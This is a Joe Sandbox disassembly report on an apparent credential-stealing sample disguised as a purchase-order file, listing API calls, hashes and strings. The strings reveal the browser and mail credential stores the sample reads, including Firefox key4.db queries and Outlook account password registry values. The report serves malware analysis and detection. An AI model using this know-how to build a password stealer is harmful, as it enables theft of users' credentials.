                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                • API String ID: 2814039832-2206097438
                                                                                • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                APIs
                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                • memset.MSVCRT ref: 0040E736
                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                • memset.MSVCRT ref: 0040E858
                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                • API String ID: 4171719235-3943159138
                                                                                • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                • GetDC.USER32 ref: 004104E2
                                                                                • strlen.MSVCRT ref: 00410522
                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 1703216249-3046471546
                                                                                • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004024F5
                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                • _mbscpy.MSVCRT(?,00000000,?,?,?,7508EB20,?,00000000), ref: 00402533
                                                                                • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                • API String ID: 168965057-606283353
                                                                                • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00402869
                                                                                  • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                • _mbscpy.MSVCRT(?,?,7508EB20,?,00000000), ref: 004028A3
                                                                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7508EB20,?,00000000), ref: 0040297B
                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                • API String ID: 1497257669-167382505
                                                                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                APIs
                                                                                • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                • memset.MSVCRT ref: 0040FCFD
                                                                                • memset.MSVCRT ref: 0040FD1D
                                                                                • memset.MSVCRT ref: 0040FD3B
                                                                                • memset.MSVCRT ref: 0040FD54
                                                                                • memset.MSVCRT ref: 0040FD72
                                                                                • memset.MSVCRT ref: 0040FD8B
                                                                                • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                • memset.MSVCRT ref: 0040FE45
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                • sprintf.MSVCRT ref: 0040FF0F
                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                Strings
                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                • {Unknown}, xrefs: 0040FD02
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                • API String ID: 1428123949-3474136107
                                                                                • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                • memset.MSVCRT ref: 0040128E
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                • String ID:
                                                                                • API String ID: 2998058495-0
                                                                                • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                APIs
                                                                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                • _strcmpi.MSVCRT ref: 0040BE93
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                • strlen.MSVCRT ref: 0040BEFE
                                                                                • strlen.MSVCRT ref: 0040BF0C
                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                • memset.MSVCRT ref: 0040BFDB
                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                • API String ID: 2303586283-933021314
                                                                                • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                • API String ID: 231171946-2189169393
                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                • API String ID: 633282248-1996832678
                                                                                • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00406782
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                Strings
                                                                                • , xrefs: 00406834
                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                • key4.db, xrefs: 00406756
                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                • API String ID: 3614188050-3983245814
                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040A973
                                                                                • memset.MSVCRT ref: 0040A996
                                                                                • memset.MSVCRT ref: 0040A9AC
                                                                                • memset.MSVCRT ref: 0040A9BC
                                                                                • sprintf.MSVCRT ref: 0040A9F0
                                                                                • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                • sprintf.MSVCRT ref: 0040AABE
                                                                                • _mbscat.MSVCRT ref: 0040AAED
                                                                                  • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                • sprintf.MSVCRT ref: 0040AB21
                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
